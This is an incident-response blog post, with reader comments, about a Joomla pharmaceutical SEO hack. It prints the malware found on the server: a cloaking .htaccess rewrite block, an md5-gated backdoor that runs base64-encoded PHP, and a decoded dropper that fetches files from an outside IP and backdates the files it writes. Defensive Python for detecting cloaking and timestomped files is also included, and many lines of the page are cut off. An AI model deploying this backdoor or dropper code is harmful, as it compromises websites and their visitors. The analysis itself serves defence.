
Joomla Pharma Hack Peter Tasker

http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/


Internet Thoughts

July 23, 2012

One of the more CSI-type things I get to do in my job is figure out how servers a
uring out why a site was listing pharmaceuticals in Google results. I've dealt a lot with hacked and compromised servers, but have never come acro
Basically, 3 modified files kept appearing on the server, a modified .htaccess file
What we discovered was the following in the .htaccess file:

    #Apache search queries statistic module
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|aol|bing|craw
    RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|
    RewriteCond %{REQUEST_URI} /$ [OR]
    RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|p
    RewriteCond %{REQUEST_FILENAME} !common.php
    RewriteCond %{DOCUMENT_ROOT}/common.php -f
    RewriteRule ^.*$ /common.php [L]
    </IfModule>
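The rules above decide, per request, whether Apache serves the real page or routes the request through common.php. The Python below models that decision so it can be checked offline; it is an added example written for this edit, not code from the post. Because the page's copy of the .htaccess is cut off at the right margin, three things are assumptions: the two alternations are used only as far as they are visible (the truncated "craw" still matches "crawler" as a substring), the extension list is assumed to stop at xml, and the user-agent and referer conditions are treated as alternatives, which is what "any search bot gets redirected" implies.

```python
import re

# Model of the cloaking rules quoted above (assumptions: alternations as visible,
# extension list ends at xml, user-agent and referer conditions joined by [OR]).
BOT_UA = re.compile(r"(google|yahoo|aol|bing|craw)", re.IGNORECASE)
SEARCH_REFERER = re.compile(r"(google|aol|yahoo|msn|search)", re.IGNORECASE)
PAGE_EXT = re.compile(r"\.(shtml|html|htm|php|xml)$", re.IGNORECASE)


def would_cloak(user_agent, referer, request_uri, common_php_exists=True):
    """True when mod_rewrite would internally route this request to /common.php.

    Consecutive RewriteCond lines are ANDed unless one carries [OR]; the only
    visible [OR] joins the "URI ends with /" test to the "page-like filename" test.
    """
    if not common_php_exists:          # RewriteCond %{DOCUMENT_ROOT}/common.php -f
        return False
    path = request_uri.split("?", 1)[0]
    if path.endswith("common.php"):    # RewriteCond %{REQUEST_FILENAME} !common.php
        return False
    looks_like_page = path.endswith("/") or PAGE_EXT.search(path) is not None
    if not looks_like_page:            # RewriteCond %{REQUEST_URI} /$ [OR] ...(ext)
        return False
    # RewriteCond %{HTTP_USER_AGENT} ... / RewriteCond %{HTTP_REFERER} ... (assumed [OR])
    return bool(BOT_UA.search(user_agent) or SEARCH_REFERER.search(referer))


# Constructed requests: what a crawler or a searcher sees versus what the owner sees.
SAMPLE_REQUESTS = [
    ("Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "", "/index.php"),
    ("Mozilla/5.0 (Windows NT 6.1) Firefox/14.0", "", "/index.php"),
    ("Mozilla/5.0 (Windows NT 6.1) Firefox/14.0", "http://www.google.com/search?q=site", "/"),
    ("Mozilla/5.0 (Windows NT 6.1) Firefox/14.0", "http://www.google.com/search?q=site", "/images/logo.png"),
    ("Mozilla/5.0 (compatible; bingbot/2.0)", "", "/common.php"),
]


def cloaked_requests():
    """The subset of SAMPLE_REQUESTS that would be served common.php instead of the real page."""
    return [r for r in SAMPLE_REQUESTS if would_cloak(*r)]


if __name__ == "__main__":
    for ua, ref, uri in SAMPLE_REQUESTS:
        verdict = "CLOAKED" if would_cloak(ua, ref, uri) else "normal"
        print(f"{verdict:8} {uri:18} ua={ua[:28]!r} referer={ref!r}")
```

The live check is the same idea against the site itself: fetch a page once with a normal browser User-Agent and once with a Googlebot User-Agent (or a google.com Referer), and diff the titles and meta descriptions. Because the RewriteRule carries no [R] flag the crawler gets common.php's output at the site's own URLs with a 200 status, which is why the owner's browser never sees anything wrong.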

What this means is that any search bot will get redirected through common.php. The RewriteRule has no [R] flag, so this is an internal rewrite: the crawler receives common.php's output at the site's own URLs with a 200 status, while a normal browser never sees it.
that modified page meta descriptions and titles. This is outlined pretty well here:
macy-hack.html. However, we deleted these files and modified the .htaccess file back to its origin
big question was how? I did a search through the Joomla source for base64_encode/decode and found
or core, but I did find a few that looked a little odd. For example:

    /**GnPvQdChUa*/ if ((md5($_REQUEST["img_id"]) == "ae6d32585e

Basically what this does is run whatever is passed in the $_REQUEST["mod_co
any base64_encoded string will be run as is. The md5() comparison on img_id is the only gate, so anyone who knows the expected value can execute arbitrary PHP as the web server user with a single request.
At 6:22 on a sunny Saturday morning, I got a notification from one of my monito

1 de 6

08/09/2013 8:21


back! I checked the logs and sure enough, here is what the request was:

/components/com_users/users.php?img_id=1f3870be274f6c

That param decodes to a lovely PHP script:

    // Fetch the door page, an include fragment and an .htaccess fragment from the remote host.
    if (extension_loaded("curl")) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://209.190.20.51/doo
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0(compa
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $door = curl_exec($ch);
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://209.190.20.51/inc
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0(compa
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $inc_code = curl_exec($ch);
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://209.190.20.51/inc
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0(compa
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $inc_ht = curl_exec($ch);
    } else {
        $door = @file_get_contents("http://209.190.20.51/door.t
        $inc_code = @file_get_contents("http://209.190.20.51/in
        $inc_ht = @file_get_contents("http://209.190.20.51/incl
    }
    // Pick an existing file to copy permissions and mtime from (the last one that exists wins).
    if (is_file("/home/user/public_html/index.html")) {
        $index = "/home/user/public_html/index.html";
    }
    if (is_file("/home/user/public_html/index.htm")) {
        $index = "/home/user/public_html/index.htm";
    }
    if (is_file("/home/user/public_html/.htaccess")) {
        $index = "/home/user/public_html/.htaccess";
    }
    if (is_file("/home/user/public_html/favicon.ico")) {
        $index = "/home/user/public_html/favicon.ico";
    }
    if (is_file("/home/user/public_html/index.php")) {
        $index = "/home/user/public_html/index.php";
    }
    if (is_file("/home/user/public_html/common.php")) {
        $index = "/home/user/public_html/common.php";
    }
    $time = filemtime($index);
    $chmod = substr(sprintf("%o", fileperms($index)), -4
    $chmod = trim($chmod);
    $chmod = intval($chmod, 8);
    // Drop common.php with the copied permissions and the copied timestamp.
    @unlink("/home/user/public_html/common.php");
    $fp = fopen("/home/user/public_html/common.php", "w");
    fputs($fp, $door);
    fclose($fp);
    @chmod("/home/user/public_html/common.php", $chmod);
    touch("/home/user/public_html/common.php", $time);
    // Rebuild .htaccess with the fetched rewrite block spliced in, same permissions and timestamp.
    $htaccess = str_replace("#####INCLUDE#####", $inc_ht, $
    @unlink("/home/user/public_html/.htaccess");
    $fp = fopen("/home/user/public_html/.htaccess", "w");
    fputs($fp, $htaccess);
    fclose($fp);
    @chmod("/home/user/public_html/.htaccess", $chmod);
    touch("/home/user/public_html/.htaccess", $time);

This little script is what recreates all the spammy files. One detail matters for cleanup: it copies the permissions and the modification time of an existing file (the last one in its list that exists) onto the files it drops, so sorting by mtime or searching with find -mtime will not show them as new. PHP cannot backdate the inode change time, so find -ctime, or comparing ctime against mtime in stat output, still surfaces them.
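Two things the investigation above relied on, as an added example written for this edit rather than code from the post: pulling the triggering request out of the access log by base64-decoding long query parameters and checking whether the result reads like PHP, and catching dropped files whose mtime has been copied from an older file by comparing it against the inode change time, which touch() cannot rewrite. The log lines, addresses and payload are constructed placeholders, not the page's own log or its payload.

```python
import base64
import binascii
import os
import re
import sys
import tempfile
import time
from urllib.parse import parse_qsl, urlsplit

# Tokens that a base64 query parameter should not decode to on a healthy site.
PHP_MARKERS = ("curl_init", "file_get_contents", "fopen(", "fputs(", "unlink(",
               "chmod(", "touch(", "eval(", "base64_decode(")

# Apache combined log format; only the request target is needed here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def decoded_payloads(log_line):
    """Return [(param_name, decoded_text)] for query parameters that decode to PHP-looking code."""
    m = LOG_RE.match(log_line)
    if not m:
        return []
    found = []
    for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        candidate = value.replace(" ", "+").strip()   # parse_qsl turns a raw '+' into a space
        if len(candidate) < 32 or not re.fullmatch(r"[A-Za-z0-9+/=_-]+", candidate):
            continue
        try:
            raw = base64.b64decode(candidate + "=" * (-len(candidate) % 4), altchars=b"-_")
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("utf-8", errors="replace")
        if sum(marker in text for marker in PHP_MARKERS) >= 2:
            found.append((name, text))
    return found


def timestomped(root, min_gap_seconds=3600):
    """Files under root whose inode change time (ctime) is well after their mtime.

    PHP's touch($file, $time) rewrites atime/mtime, but the kernel sets ctime on
    every write, chmod or utime call and offers no way to backdate it, so a fresh
    file that claims an old mtime stands out. Unix semantics assumed.
    """
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            try:
                st = os.stat(p)
            except OSError:
                continue
            if st.st_ctime - st.st_mtime >= min_gap_seconds:
                hits.append((p, st.st_mtime, st.st_ctime))
    hits.sort(key=lambda h: h[2], reverse=True)
    return hits


def demo_timestomped():
    """Drop a scratch file with its mtime pushed a year back, as the dropper does, and detect it."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "common.php")
        with open(p, "w") as fh:
            fh.write("<?php // dropped file\n")
        old = time.time() - 365 * 86400
        os.utime(p, (old, old))           # same effect as PHP touch($file, $time)
        return timestomped(d)


# Constructed log lines with placeholder addresses and a placeholder payload.
_PAYLOAD = base64.b64encode(
    b'$d=file_get_contents("http://203.0.113.10/door.txt");'
    b'$fp=fopen("/home/user/public_html/common.php","w");fputs($fp,$d);fclose($fp);'
    b'touch("/home/user/public_html/common.php",$t);'
).decode()
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Jul/2012:06:22:01 +0000] "GET /components/com_users/users.php?img_id=0123456789abcdef&payload='
    + _PAYLOAD + ' HTTP/1.1" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '203.0.113.42 - - [21/Jul/2012:06:25:13 +0000] "GET /index.php?option=com_content&view=article&id=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/14.0"',
    '203.0.113.42 - - [21/Jul/2012:06:25:14 +0000] "GET /images/banner.png HTTP/1.1" 200 5531 "http://example.test/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    lines = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG
    for line in lines:
        for name, text in decoded_payloads(line.rstrip("\n")):
            print(f"{line.split()[0]} param={name!r} decodes to: {text[:80]}...")
    for path, mtime, ctime in demo_timestomped():
        print(f"ctime {time.ctime(ctime)} but mtime {time.ctime(mtime)}: {path}")
```

Point the first half at a real access log (`python triage.py access.log`) and point timestomped() at the web root; the ctime gap is the quickest way to list every file the dropper wrote, including ones whose names differ from the three the post mentions.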


So there it is, a URL param that runs cURL requests to set up spam files on a s
Wanted to record this so that anyone else having this issue has somewhere to lo
TTFN.

This entry was posted in Code, Joomla.


8 COMMENTS

Luc | July 25, 2012 at 12:32 pm

Hi, I have the same on my site. Search for a mod_joomla.php in my case. Which is the first file created and what is the best way to prevent this attack?

petetasker | July 25, 2012 at 1:50 pm

Change all your FTP, Joomla passwords and I would disable Jumi or Sourcerer
Best way to prevent it is to keep Joomla patched and up to date and don't instal
of.


Check out the vulnerable extensions list (http://docs.joomla.org/Vulnerable_Exte
cure upload form that was included in a page using Jumi. Also, search the source code for any base64_encode() or eval() statements.

sam | November 19, 2012 at 5:51 pm

Found out that if you rename your admin folder to something other
(hasn't shown up after the usual couple of hours at least). Maybe

FlyingPizzas | November 8, 2012 at 11:21 am

Found the same hack on a Drupal site. Thanks for your post as it helped us to identify the pro

Stacy Holmstedt | November 24, 2012 at 7:39 pm

Looks like this has hit WordPress now, too. Instead of coockies.txt there's a folder called coo
new files. After sifting through server logs, I noticed a few hacked files in my wp-themes folde
stall-list-table.php and wp-admin/load-styles.php. Hacked files start with <?php and some md
running wp-cron.php. I also noticed an empty folder called .logs in my root and wonder if that
elsewhere). Thanks for the post, it was a good start.

petetasker | November 28, 2012 at 3:54 pm

Ya, the site that was originally infected was moved to another webhost and thing
I'm thinking it has something to do with log files as well, because even after rem
file came back.

Erik Stenman | February 7, 2013 at 12:31 am

I found a file located at /en/rss.php containing a remote access terminal.


aquaholic | February 7, 2013 at 8:08 pm

I had this same problem recently and got rid of the three files you mention at the beginning of
later it is back. These files no longer exist but the problem is back. Any idea what to look for?
I am not nearly as techie with the scripts and looking at logs so some good old fashioned han
Many thanks, Houston
